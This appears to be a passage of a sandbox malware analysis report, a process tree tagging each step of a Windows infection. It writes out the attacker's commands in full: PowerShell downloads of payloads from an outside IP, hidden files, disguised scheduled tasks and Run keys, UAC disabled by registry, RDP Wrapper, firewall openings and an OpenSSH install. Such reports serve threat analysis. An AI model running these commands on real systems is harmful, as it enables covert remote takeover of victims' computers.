                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2812
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')
                                                                                                        3⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1456
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Powershell Expand-Archive "ngrok.zip" -DestinationPath "."
                                                                                                        3⤵
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1580
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')
                                                                                                        3⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3384
                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                        attrib +s +h C:\programdata\Windata
                                                                                                        3⤵
                                                                                                        • Sets file to hidden
                                                                                                        • Views/modifies file attributes
                                                                                                        PID:4764
                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                        attrib +s +h C:\programdata\Windata\*.*
                                                                                                        3⤵
                                                                                                        • Sets file to hidden
                                                                                                        • Views/modifies file attributes
                                                                                                        PID:4044
                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                        attrib -s +h *.bat
                                                                                                        3⤵
                                                                                                        • Sets file to hidden
                                                                                                        • Views/modifies file attributes
                                                                                                        PID:4908
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:4416
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /create /tn "WindowsPowerup_OnLogon" /ru "Admin" /sc onlogon /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:828
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /create /tn WindowsUpdate /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\smhost.exe" /f /it
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2132
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /create /tn "WindowsUpdate_OnLogon" /ru "Admin" /sc onlogon /RL HIGHEST /tr "C:\ProgramData\Windata\smhost.exe" /f /it
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:4500
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 15 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2352
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /create /tn "Winlogo_OnLogon" /ru "Admin" /sc onlogon /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:60
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:3328
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /create /tn "WindowsUp_OnLogon" /ru "Admin" /sc onlogon /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:3192
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"
                                                                                                        3⤵
                                                                                                        • Adds Run key to start application
                                                                                                        PID:2528
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "winlogo" /t REG_SZ /F /D "C:\ProgramData\Windata\winlogin.exe"
                                                                                                        3⤵
                                                                                                        • Adds Run key to start application
                                                                                                        PID:852
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdate" /t REG_SZ /F /D "C:\ProgramData\Windata\smhost.exe"
                                                                                                        3⤵
                                                                                                        • Adds Run key to start application
                                                                                                        PID:2604
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"
                                                                                                        3⤵
                                                                                                        • Adds Run key to start application
                                                                                                        PID:4348
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /create /tn Winupdate_Time /ru "Admin" /sc minute /mo 15 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:832
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                        3⤵
                                                                                                        • UAC bypass
                                                                                                        • Modifies registry key
                                                                                                        PID:2736
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /run /tn winlogo
                                                                                                        3⤵
                                                                                                          PID:1576
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks /run /tn WindowsUp
                                                                                                          3⤵
                                                                                                            PID:4764
                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                            schtasks /run /tn WindowsPowerup
                                                                                                            3⤵
                                                                                                              PID:4416
                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                              schtasks /run /tn WindowsUpdate
                                                                                                              3⤵
                                                                                                                PID:4500
                                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                                attrib -s +h *.bat
                                                                                                                3⤵
                                                                                                                • Sets file to hidden
                                                                                                                • Views/modifies file attributes
                                                                                                                PID:3704
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                cmd /C C:\ProgramData\Windata\installer.bat
                                                                                                                3⤵
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:3328
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')
                                                                                                                  4⤵
                                                                                                                  • Blocklisted process makes network request
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4760
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Powershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"
                                                                                                                  4⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4708
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  cmd /C C:\ProgramData\Windata\hrdp\install.bat
                                                                                                                  4⤵
                                                                                                                    PID:4100
                                                                                                                    • C:\ProgramData\Windata\hrdp\RDPWInst.exe
                                                                                                                      "C:\ProgramData\Windata\hrdp\RDPWInst" -i -o
                                                                                                                      5⤵
                                                                                                                      • Server Software Component: Terminal Services DLL
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Modifies WinLogon
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2592
                                                                                                                      • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                        6⤵
                                                                                                                        • Modifies Windows Firewall
                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                        PID:5468
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')
                                                                                                                    4⤵
                                                                                                                    • Blocklisted process makes network request
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5564
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')
                                                                                                                    4⤵
                                                                                                                    • Blocklisted process makes network request
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5704
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Powershell Expand-Archive "update.zip" -DestinationPath "."
                                                                                                                    4⤵
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5308
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Powershell Expand-Archive "autoupdate.zip" -DestinationPath "."
                                                                                                                    4⤵
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5784
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    cmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"
                                                                                                                    4⤵
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    PID:5984
                                                                                                                    • C:\Windows\system32\fsutil.exe
                                                                                                                      fsutil dirty query C:
                                                                                                                      5⤵
                                                                                                                        PID:6076
                                                                                                                      • C:\Windows\system32\findstr.exe
                                                                                                                        findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                        5⤵
                                                                                                                          PID:1540
                                                                                                                        • C:\Windows\system32\findstr.exe
                                                                                                                          findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                          5⤵
                                                                                                                            PID:6120
                                                                                                                          • C:\Windows\system32\findstr.exe
                                                                                                                            findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                            5⤵
                                                                                                                              PID:6100
                                                                                                                            • C:\Windows\system32\findstr.exe
                                                                                                                              findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                              5⤵
                                                                                                                                PID:6048
                                                                                                                              • C:\Windows\system32\findstr.exe
                                                                                                                                findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                                5⤵
                                                                                                                                  PID:6056
                                                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                                                  findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                                  5⤵
                                                                                                                                    PID:4916
                                                                                                                                  • C:\Windows\system32\findstr.exe
                                                                                                                                    findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                                    5⤵
                                                                                                                                      PID:956
                                                                                                                                    • C:\Windows\system32\findstr.exe
                                                                                                                                      findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                                      5⤵
                                                                                                                                        PID:6072
                                                                                                                                      • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                                        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:380
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      cmd /C "C:\Program Files\RDP Wrapper\re-install.bat"
                                                                                                                                      4⤵
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      PID:5380
                                                                                                                                      • C:\Windows\system32\fsutil.exe
                                                                                                                                        fsutil dirty query C:
                                                                                                                                        5⤵
                                                                                                                                          PID:2504
                                                                                                                                        • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                                          "C:\Program Files\RDP Wrapper\RDPWInst" -u
                                                                                                                                          5⤵
                                                                                                                                          • Server Software Component: Terminal Services DLL
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:1004
                                                                                                                                          • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                            netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                                                                                            6⤵
                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                            PID:1576
                                                                                                                                        • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                                          "C:\Program Files\RDP Wrapper\RDPWInst" -i -o
                                                                                                                                          5⤵
                                                                                                                                          • Server Software Component: Terminal Services DLL
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Modifies WinLogon
                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5432
                                                                                                                                          • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                            netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                                            6⤵
                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                            PID:5612
                                                                                                                                        • C:\Windows\system32\fsutil.exe
                                                                                                                                          fsutil dirty query C:
                                                                                                                                          5⤵
                                                                                                                                            PID:5908
                                                                                                                                          • C:\Windows\system32\findstr.exe
                                                                                                                                            findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                                            5⤵
                                                                                                                                              PID:5776
                                                                                                                                            • C:\Windows\system32\findstr.exe
                                                                                                                                              findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                                              5⤵
                                                                                                                                                PID:5272
                                                                                                                                              • C:\Windows\system32\findstr.exe
                                                                                                                                                findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                                                5⤵
                                                                                                                                                  PID:1632
                                                                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                                                                  findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:5504
                                                                                                                                                  • C:\Windows\system32\findstr.exe
                                                                                                                                                    findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                                                    5⤵
                                                                                                                                                      PID:8
                                                                                                                                                    • C:\Windows\system32\findstr.exe
                                                                                                                                                      findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:3108
                                                                                                                                                      • C:\Windows\system32\findstr.exe
                                                                                                                                                        findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                                                        5⤵
                                                                                                                                                          PID:3632
                                                                                                                                                        • C:\Windows\system32\findstr.exe
                                                                                                                                                          findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:1532
                                                                                                                                                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                                                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
                                                                                                                                                            5⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:3168
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          cmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:4728
                                                                                                                                                            • C:\Windows\system32\fsutil.exe
                                                                                                                                                              fsutil dirty query C:
                                                                                                                                                              5⤵
                                                                                                                                                                PID:3112
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks /create /f /sc ONSTART /tn "RDP Wrapper Autoupdate" /tr "cmd.exe /C \"C:\Program Files\RDP Wrapper\autoupdate.bat\" -log" /ru SYSTEM /delay 0000:10
                                                                                                                                                                5⤵
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:5072
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell "$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries; Set-ScheduledTask -TaskName 'RDP Wrapper Autoupdate' -Settings $settings"
                                                                                                                                                                5⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:392
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              cmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"
                                                                                                                                                              4⤵
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              PID:5032
                                                                                                                                                              • C:\Windows\system32\fsutil.exe
                                                                                                                                                                fsutil dirty query C:
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:4628
                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                  sc queryex "TermService"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                  PID:2840
                                                                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                                                                  find "STATE"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:1160
                                                                                                                                                                  • C:\Windows\system32\find.exe
                                                                                                                                                                    find /v "RUNNING"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:3156
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c query session rdp-tcp
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:3148
                                                                                                                                                                        • C:\Windows\system32\query.exe
                                                                                                                                                                          query session rdp-tcp
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:4224
                                                                                                                                                                            • C:\Windows\system32\qwinsta.exe
                                                                                                                                                                              "C:\Windows\system32\qwinsta.exe" rdp-tcp
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:860
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll"
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Server Software Component: Terminal Services DLL
                                                                                                                                                                            PID:5716
                                                                                                                                                                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                                                                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Server Software Component: Terminal Services DLL
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:5752
                                                                                                                                                                            • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                                                              netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                              PID:3480
                                                                                                                                                                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                                                                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Server Software Component: Terminal Services DLL
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Modifies WinLogon
                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:2488
                                                                                                                                                                            • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                                                              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                              PID:4408
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:4788
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:2712
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5852
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:3324
                                                                                                                                                                                    • C:\Windows\system32\cscript.exe
                                                                                                                                                                                      cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:5468
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:3764
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:2592
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.1202" /f
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:1692
                                                                                                                                                                                          • C:\Windows\system32\findstr.exe
                                                                                                                                                                                            findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:4392
                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                              ping -n 1 google.com
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                              PID:804
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:2716
                                                                                                                                                                                                • C:\Windows\system32\cscript.exe
                                                                                                                                                                                                  cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  PID:4308
                                                                                                                                                                                              • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                                                                                                "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Server Software Component: Terminal Services DLL
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:5932
                                                                                                                                                                                                • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                                                                                  netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                  PID:5856
                                                                                                                                                                                              • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                                                                                                "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Server Software Component: Terminal Services DLL
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Modifies WinLogon
                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:5976
                                                                                                                                                                                                • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                                                                                  netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                  PID:4016
                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:5940
                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                  reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:2732
                                                                                                                                                                                                  • C:\Windows\system32\findstr.exe
                                                                                                                                                                                                    findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:1444
                                                                                                                                                                                                • C:\Windows\system32\Dism.exe
                                                                                                                                                                                                  dism /Online /Add-Capability /CapabilityName:OpenSSH.Server~~~~0.0.1.0
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  PID:6104
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F8968626-3414-436A-BBD3-D88456FCCDEE\dismhost.exe
